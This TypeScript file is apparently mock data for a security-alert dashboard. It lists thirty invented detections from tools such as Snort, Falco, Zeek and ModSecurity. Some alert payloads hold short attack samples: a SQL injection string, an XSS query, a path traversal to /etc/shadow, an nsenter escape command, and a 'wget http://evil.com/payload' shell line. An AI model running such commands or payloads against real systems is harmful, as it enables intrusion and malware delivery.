export interface MockEvent {
  id: string;
  sourceTool: string;
  timestamp: string;
  priority: string;
  description: string;
  reportUrl: string;
  count: number;
  askedAnalysis: boolean;
  finished: boolean;
  rawPayload: Record<string, unknown>;
}

export const mockEvents: MockEvent[] = [
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000001",
    sourceTool: "Snort",
    timestamp: "2026-03-07T14:23:10Z",
    priority: "Critical",
    description: "SQL injection attempt detected on /api/login endpoint",
    reportUrl: "https://reports.example.com/r/001",
    count: 5,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      alert: {
        signature_id: 1001,
        signature: "SQL Injection attempt",
        category: "Web Application Attack",
        severity: 1,
      },
      src_ip: "198.51.100.22",
      dest_ip: "10.0.1.5",
      src_port: 54312,
      dest_port: 443,
      proto: "TCP",
      http: {
        hostname: "api.example.com",
        url: "/api/login",
        http_method: "POST",
        http_content_type: "application/json",
        status: 403,
      },
      payload: "JyBPUiAnMSc9JzEn",
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000002",
    sourceTool: "OSSEC",
    timestamp: "2026-03-07T13:45:32Z",
    priority: "Critical",
    description: "Rootkit detection triggered on host db-prod-01",
    reportUrl: "https://reports.example.com/r/002",
    count: 1,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      rule: { level: 12, id: "510", description: "Rootkit detection" },
      agent: { id: "003", name: "db-prod-01", ip: "10.0.3.10" },
      decoder: { name: "rootcheck" },
      data: {
        title: "Trojaned version of file detected",
        file: "/usr/bin/curl",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000003",
    sourceTool: "Suricata",
    timestamp: "2026-03-07T12:10:05Z",
    priority: "Medium",
    description: "Suspicious outbound traffic to known C2 server 198.51.100.44",
    reportUrl: "https://reports.example.com/r/003",
    count: 12,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      event_type: "alert",
      src_ip: "10.0.2.8",
      dest_ip: "198.51.100.44",
      src_port: 49221,
      dest_port: 8443,
      proto: "TCP",
      alert: {
        action: "allowed",
        gid: 1,
        signature_id: 2025901,
        rev: 3,
        signature: "ET TROJAN Possible C2 Communication",
        category: "A Network Trojan was detected",
      },
      flow: { bytes_toserver: 4520, bytes_toclient: 89200 },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000004",
    sourceTool: "ClamAV",
    timestamp: "2026-03-07T11:30:00Z",
    priority: "Medium",
    description: "Trojan.GenericKD.46876543 found in /tmp/uploads/invoice.pdf",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      scan: {
        file: "/tmp/uploads/invoice.pdf",
        size: 245760,
        md5: "d41d8cd98f00b204e9800998ecf8427e",
        sha256:
          "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
      },
      result: {
        virus: "Trojan.GenericKD.46876543",
        engine_version: "0.104.3",
        database_version: "27150",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000005",
    sourceTool: "Falco",
    timestamp: "2026-03-07T10:55:18Z",
    priority: "Critical",
    description:
      "Container escape attempt detected in pod kube-system/etcd-main",
    reportUrl: "https://reports.example.com/r/005",
    count: 2,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      output:
        "Container escape attempt detected (user=root pod=etcd-main ns=kube-system)",
      priority: "Critical",
      rule: "Container Escape via nsenter",
      source: "syscall",
      output_fields: {
        container_id: "abc123def456",
        container_name: "etcd",
        k8s_ns_name: "kube-system",
        k8s_pod_name: "etcd-main",
        proc_cmdline: "nsenter -t 1 -m -u -i -n",
        user_name: "root",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000006",
    sourceTool: "Wazuh",
    timestamp: "2026-03-07T09:20:44Z",
    priority: "Low",
    description: "Multiple failed SSH login attempts from 203.0.113.77",
    reportUrl: "",
    count: 47,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      rule: {
        id: "5710",
        level: 5,
        description: "sshd: Attempt to login using a non-existent user",
      },
      agent: { id: "007", name: "web-prod-01", ip: "10.0.1.2" },
      data: { srcip: "203.0.113.77", srcport: "44832", dstuser: "admin" },
      location: "/var/log/auth.log",
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000007",
    sourceTool: "ModSecurity",
    timestamp: "2026-03-07T08:15:29Z",
    priority: "Critical",
    description:
      "Cross-site scripting (XSS) payload blocked on /search endpoint",
    reportUrl: "https://reports.example.com/r/007",
    count: 3,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      transaction: {
        id: "Yx2kL8CoAqkAAG3tAyAAAAAS",
        request: {
          method: "GET",
          uri: "/search?q=%3Cscript%3Ealert(1)%3C/script%3E",
          headers: { host: "www.example.com", "user-agent": "Mozilla/5.0" },
        },
        response: { status: 403 },
      },
      messages: [
        {
          message: "XSS Attack Detected via libinjection",
          ruleId: 941100,
          severity: "CRITICAL",
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000008",
    sourceTool: "Zeek",
    timestamp: "2026-03-07T07:40:11Z",
    priority: "Medium",
    description: "DNS tunneling activity detected from internal host 10.0.2.15",
    reportUrl: "https://reports.example.com/r/008",
    count: 8,
    askedAnalysis: false,
    finished: false,
    rawPayload: {
      ts: 1741322411.0,
      uid: "CYz2Le1gxKbEiKu4Gi",
      id_orig_h: "10.0.2.15",
      id_resp_h: "8.8.8.8",
      id_resp_p: 53,
      proto: "udp",
      query: "aGVsbG8gd29ybGQ.data.evil-tunnel.com",
      qtype: 16,
      rcode: 0,
      answers: ["TXT: dGhpcyBpcyBhIHRlc3Q="],
      notice: {
        note: "DNS::Tunneling",
        msg: "High entropy DNS queries detected",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000009",
    sourceTool: "Snort",
    timestamp: "2026-03-07T06:05:53Z",
    priority: "Low",
    description: "Port scan detected from 192.0.2.100 targeting ports 1-1024",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      alert: {
        signature_id: 469,
        signature: "ICMP PING NMAP",
        category: "Attempted Information Leak",
      },
      src_ip: "192.0.2.100",
      dest_ip: "10.0.1.0/24",
      classification: "portscan",
      portscan: {
        scanner_ip: "192.0.2.100",
        port_count: 1024,
        start_time: "2026-03-07T06:00:00Z",
        end_time: "2026-03-07T06:05:53Z",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000010",
    sourceTool: "Trivy",
    timestamp: "2026-03-07T05:30:07Z",
    priority: "Medium",
    description: "Critical CVE-2026-1234 found in container image nginx:1.25",
    reportUrl: "https://reports.example.com/r/010",
    count: 1,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      ArtifactName: "nginx:1.25",
      ArtifactType: "container_image",
      Results: [
        {
          Target: "nginx:1.25 (debian 12.4)",
          Vulnerabilities: [
            {
              VulnerabilityID: "CVE-2026-1234",
              PkgName: "libssl3",
              InstalledVersion: "3.0.13-1~deb12u1",
              FixedVersion: "3.0.13-1~deb12u2",
              Severity: "CRITICAL",
              Title: "OpenSSL: Buffer overflow in TLS handshake",
            },
          ],
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000011",
    sourceTool: "OSSEC",
    timestamp: "2026-03-06T23:58:40Z",
    priority: "Medium",
    description: "File integrity change detected on /etc/passwd",
    reportUrl: "",
    count: 1,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      rule: { level: 7, id: "550", description: "Integrity checksum changed" },
      agent: { id: "005", name: "app-prod-02", ip: "10.0.2.5" },
      syscheck: {
        path: "/etc/passwd",
        md5_before: "abc123",
        md5_after: "def456",
        sha1_before: "111aaa",
        sha1_after: "222bbb",
        event: "modified",
        mode: "realtime",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000012",
    sourceTool: "Falco",
    timestamp: "2026-03-06T22:14:22Z",
    priority: "Critical",
    description:
      "Unexpected process 'cryptominer' spawned in production container",
    reportUrl: "https://reports.example.com/r/012",
    count: 1,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      output:
        "Unexpected process spawned in container (proc=cryptominer user=www-data)",
      priority: "Warning",
      rule: "Unexpected Spawned Process",
      source: "syscall",
      output_fields: {
        container_id: "f9e8d7c6b5a4",
        container_name: "web-app",
        proc_name: "cryptominer",
        proc_cmdline: "./cryptominer --pool stratum://pool.evil.com:3333",
        user_name: "www-data",
        proc_pname: "sh",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000013",
    sourceTool: "Suricata",
    timestamp: "2026-03-06T21:02:15Z",
    priority: "Low",
    description: "TLS certificate mismatch for api.internal.corp",
    reportUrl: "",
    count: 3,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      event_type: "tls",
      src_ip: "10.0.1.50",
      dest_ip: "10.0.3.20",
      tls: {
        subject: "CN=malicious.example.com",
        issuerdn: "CN=FakeCA",
        serial: "01:02:03:04",
        sni: "api.internal.corp",
        version: "TLS 1.2",
        notbefore: "2026-01-01",
        notafter: "2027-01-01",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000014",
    sourceTool: "Wazuh",
    timestamp: "2026-03-06T19:48:33Z",
    priority: "Low",
    description:
      "User 'admin' logged in from unusual geo-location (Country: RU)",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      rule: {
        id: "5501",
        level: 3,
        description: "Login from unusual location",
      },
      agent: { id: "001", name: "auth-server", ip: "10.0.0.5" },
      data: {
        srcip: "91.108.4.33",
        user: "admin",
        geo: { country: "RU", city: "Moscow", lat: 55.7558, lon: 37.6173 },
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000015",
    sourceTool: "ModSecurity",
    timestamp: "2026-03-06T18:30:09Z",
    priority: "Critical",
    description:
      "Remote code execution attempt via deserialization on /api/webhook",
    reportUrl: "https://reports.example.com/r/015",
    count: 2,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      transaction: {
        id: "Yx3mN9DoAqkBBH4uBzAAAABT",
        request: {
          method: "POST",
          uri: "/api/webhook",
          headers: { "content-type": "application/x-java-serialized-object" },
          body_base64: "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA...",
        },
      },
      messages: [
        {
          message: "Java deserialization RCE attempt",
          ruleId: 944100,
          severity: "CRITICAL",
          data: "Matched pattern: aced0005",
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000016",
    sourceTool: "ClamAV",
    timestamp: "2026-03-06T17:15:50Z",
    priority: "Medium",
    description: "PUA.Win32.Packer detected in uploaded file resume.docx",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      scan: {
        file: "/tmp/uploads/resume.docx",
        size: 102400,
        md5: "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6",
        sha256:
          "1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef",
      },
      result: {
        virus: "PUA.Win32.Packer-7",
        engine_version: "0.104.3",
        database_version: "27148",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000017",
    sourceTool: "Zeek",
    timestamp: "2026-03-06T16:00:27Z",
    priority: "Medium",
    description:
      "Large data exfiltration detected: 2.3 GB uploaded to external IP",
    reportUrl: "https://reports.example.com/r/017",
    count: 1,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      ts: 1741276827.0,
      uid: "Dq5wKe2hRKbNiMu9Zk",
      id_orig_h: "10.0.4.12",
      id_resp_h: "104.21.32.1",
      id_resp_p: 443,
      proto: "tcp",
      conn: { duration: 3842.5, orig_bytes: 2469134336, resp_bytes: 51200 },
      notice: {
        note: "Data::Exfiltration",
        msg: "Unusually large upload to external host",
        sub: "2.3 GB in 64 minutes",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000018",
    sourceTool: "Trivy",
    timestamp: "2026-03-06T14:45:13Z",
    priority: "Low",
    description:
      "Medium vulnerability CVE-2025-9876 in python:3.12-slim base image",
    reportUrl: "",
    count: 4,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      ArtifactName: "python:3.12-slim",
      ArtifactType: "container_image",
      Results: [
        {
          Target: "python:3.12-slim (debian 12.4)",
          Vulnerabilities: [
            {
              VulnerabilityID: "CVE-2025-9876",
              PkgName: "libexpat1",
              InstalledVersion: "2.5.0-1",
              FixedVersion: "2.5.0-1+deb12u1",
              Severity: "MEDIUM",
              Title: "expat: Integer overflow in XML parsing",
            },
          ],
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000019",
    sourceTool: "Snort",
    timestamp: "2026-03-06T13:20:58Z",
    priority: "Critical",
    description: "Exploit kit delivery attempt via malicious ad redirect chain",
    reportUrl: "https://reports.example.com/r/019",
    count: 1,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      alert: {
        signature_id: 2030102,
        signature: "ET EXPLOIT_KIT RIG Landing Page",
        category: "Exploit Kit Activity",
        severity: 1,
      },
      src_ip: "198.51.100.88",
      dest_ip: "10.0.1.15",
      http: {
        hostname: "ads.malvertising.example",
        url: "/landing?id=xk29f",
        redirect_chain: [
          "legit-ads.com/click",
          "tracker.evil.net/redir",
          "ads.malvertising.example/landing",
        ],
      },
      payload_info: { type: "javascript", obfuscated: true },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000020",
    sourceTool: "Falco",
    timestamp: "2026-03-06T12:05:41Z",
    priority: "Medium",
    description:
      "Sensitive mount detected: /var/run/docker.sock mounted in container",
    reportUrl: "https://reports.example.com/r/020",
    count: 6,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      output:
        "Sensitive mount in container (mount=/var/run/docker.sock container=deploy-agent)",
      priority: "Warning",
      rule: "Launch Sensitive Mount Container",
      source: "syscall",
      output_fields: {
        container_id: "7a8b9c0d1e2f",
        container_image: "deploy-agent:latest",
        container_name: "deploy-agent",
        k8s_ns_name: "ci-cd",
        k8s_pod_name: "deploy-agent-5f4d3c2b1a",
        mount_dest: "/var/run/docker.sock",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000021",
    sourceTool: "OSSEC",
    timestamp: "2026-03-06T10:50:30Z",
    priority: "Low",
    description: "Successful sudo command by user 'deploy' on web-prod-03",
    reportUrl: "",
    count: 15,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      rule: {
        level: 3,
        id: "5402",
        description: "Successful sudo to ROOT executed",
      },
      agent: { id: "010", name: "web-prod-03", ip: "10.0.1.8" },
      data: {
        srcuser: "deploy",
        dstuser: "root",
        command: "/usr/bin/systemctl restart nginx",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000022",
    sourceTool: "Wazuh",
    timestamp: "2026-03-06T09:35:14Z",
    priority: "Medium",
    description: "Windows Defender disabled on endpoint WORKSTATION-042",
    reportUrl: "",
    count: 1,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      rule: {
        id: "91530",
        level: 6,
        description: "Windows Defender real-time protection disabled",
      },
      agent: { id: "042", name: "WORKSTATION-042", ip: "10.0.10.42" },
      data: {
        win: {
          eventdata: { oldValue: "1", newValue: "0" },
          system: {
            eventID: "5001",
            providerName: "Microsoft-Windows-Windows Defender",
          },
        },
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000023",
    sourceTool: "ModSecurity",
    timestamp: "2026-03-06T08:10:02Z",
    priority: "Critical",
    description: "Path traversal attempt: GET /../../etc/shadow on web gateway",
    reportUrl: "https://reports.example.com/r/023",
    count: 2,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      transaction: {
        id: "Zx1nK7BpCrkDDG2sAxAAAACU",
        request: {
          method: "GET",
          uri: "/static/../../etc/shadow",
          headers: { host: "www.example.com", "user-agent": "curl/8.1.0" },
        },
        response: { status: 403 },
      },
      messages: [
        {
          message: "Path Traversal Attack (/../)",
          ruleId: 930100,
          severity: "CRITICAL",
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000024",
    sourceTool: "Suricata",
    timestamp: "2026-03-06T06:55:47Z",
    priority: "Low",
    description:
      "Unusual ICMP traffic pattern from 10.0.5.20 — possible ping sweep",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      event_type: "alert",
      src_ip: "10.0.5.20",
      dest_ip: "10.0.5.0/24",
      proto: "ICMP",
      icmp_type: 8,
      icmp_code: 0,
      alert: {
        action: "allowed",
        gid: 1,
        signature_id: 2100366,
        signature: "GPL ICMP_INFO PING sweep",
        category: "Attempted Information Leak",
      },
      packet_info: { repeat_count: 254, interval_ms: 50 },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000025",
    sourceTool: "Zeek",
    timestamp: "2026-03-06T05:40:33Z",
    priority: "Medium",
    description:
      "HTTP traffic to known phishing domain login-secure-update.xyz",
    reportUrl: "https://reports.example.com/r/025",
    count: 3,
    askedAnalysis: false,
    finished: false,
    rawPayload: {
      ts: 1741239633.0,
      uid: "Hp8qRf3kSLcOjNw2Bm",
      id_orig_h: "10.0.3.5",
      id_resp_h: "104.21.45.67",
      id_resp_p: 443,
      proto: "tcp",
      http: {
        host: "login-secure-update.xyz",
        uri: "/signin",
        method: "GET",
        status_code: 200,
      },
      intel: {
        indicator: "login-secure-update.xyz",
        indicator_type: "Intel::DOMAIN",
        source: "PhishTank Feed",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000026",
    sourceTool: "ClamAV",
    timestamp: "2026-03-06T04:25:19Z",
    priority: "Critical",
    description:
      "Ransomware signature Ransom.WannaCry detected in email attachment",
    reportUrl: "https://reports.example.com/r/026",
    count: 1,
    askedAnalysis: true,
    finished: true,
    rawPayload: {
      scan: {
        file: "/var/mail/attachments/invoice_march.zip",
        size: 5242880,
        md5: "84c82835a5d21bbcf75a61706d8ab549",
        sha256:
          "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
      },
      result: {
        virus: "Ransom.WannaCry-9",
        engine_version: "0.104.3",
        database_version: "27145",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000027",
    sourceTool: "Trivy",
    timestamp: "2026-03-06T03:10:05Z",
    priority: "Low",
    description: "Low severity CVE-2025-5555 in libexpat dependency",
    reportUrl: "",
    count: 9,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      ArtifactName: "myapp:v2.1.0",
      ArtifactType: "container_image",
      Results: [
        {
          Target: "myapp:v2.1.0 (alpine 3.19)",
          Vulnerabilities: [
            {
              VulnerabilityID: "CVE-2025-5555",
              PkgName: "expat",
              InstalledVersion: "2.5.0-r2",
              FixedVersion: "2.5.0-r3",
              Severity: "LOW",
              Title: "expat: Minor memory leak in parser cleanup",
            },
          ],
        },
      ],
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000028",
    sourceTool: "Snort",
    timestamp: "2026-03-06T01:55:48Z",
    priority: "Medium",
    description: "Brute force attack detected on RDP service 10.0.1.5:3389",
    reportUrl: "https://reports.example.com/r/028",
    count: 230,
    askedAnalysis: true,
    finished: false,
    rawPayload: {
      alert: {
        signature_id: 2001219,
        signature: "ET SCAN Potential RDP Brute Force",
        category: "Attempted Administrator Privilege Gain",
      },
      src_ip: "203.0.113.200",
      dest_ip: "10.0.1.5",
      dest_port: 3389,
      proto: "TCP",
      flowbits: {
        brute_force_count: 230,
        first_seen: "2026-03-06T01:00:00Z",
        last_seen: "2026-03-06T01:55:48Z",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000029",
    sourceTool: "Falco",
    timestamp: "2026-03-06T00:40:31Z",
    priority: "Medium",
    description:
      "Shell spawned inside container api-gateway with unexpected args",
    reportUrl: "",
    count: 2,
    askedAnalysis: false,
    finished: true,
    rawPayload: {
      output:
        "Shell spawned in container (shell=/bin/bash args=-c wget http://evil.com/payload)",
      priority: "Notice",
      rule: "Terminal shell in container",
      source: "syscall",
      output_fields: {
        container_id: "1a2b3c4d5e6f",
        container_name: "api-gateway",
        proc_name: "bash",
        proc_cmdline: "bash -c wget http://evil.com/payload",
        user_name: "node",
      },
    },
  },
  {
    id: "a1b2c3d4-1111-4a1b-8c1d-000000000030",
    sourceTool: "Wazuh",
    timestamp: "2026-03-05T23:25:17Z",
    priority: "Low",
    description:
      "New user account 'svc_backup' created on domain controller DC-01",
    reportUrl: "",
    count: 1,
    askedAnalysis: false,
    finished: false,
    rawPayload: {
      rule: {
        id: "5137",
        level: 5,
        description: "New user added to the system",
      },
      agent: { id: "100", name: "DC-01", ip: "10.0.0.1" },
      data: {
        win: {
          eventdata: {
            targetUserName: "svc_backup",
            targetDomainName: "CORP",
            subjectUserName: "admin",
            subjectDomainName: "CORP",
          },
          system: {
            eventID: "4720",
            providerName: "Microsoft-Windows-Security-Auditing",
          },
        },
      },
    },
  },
];
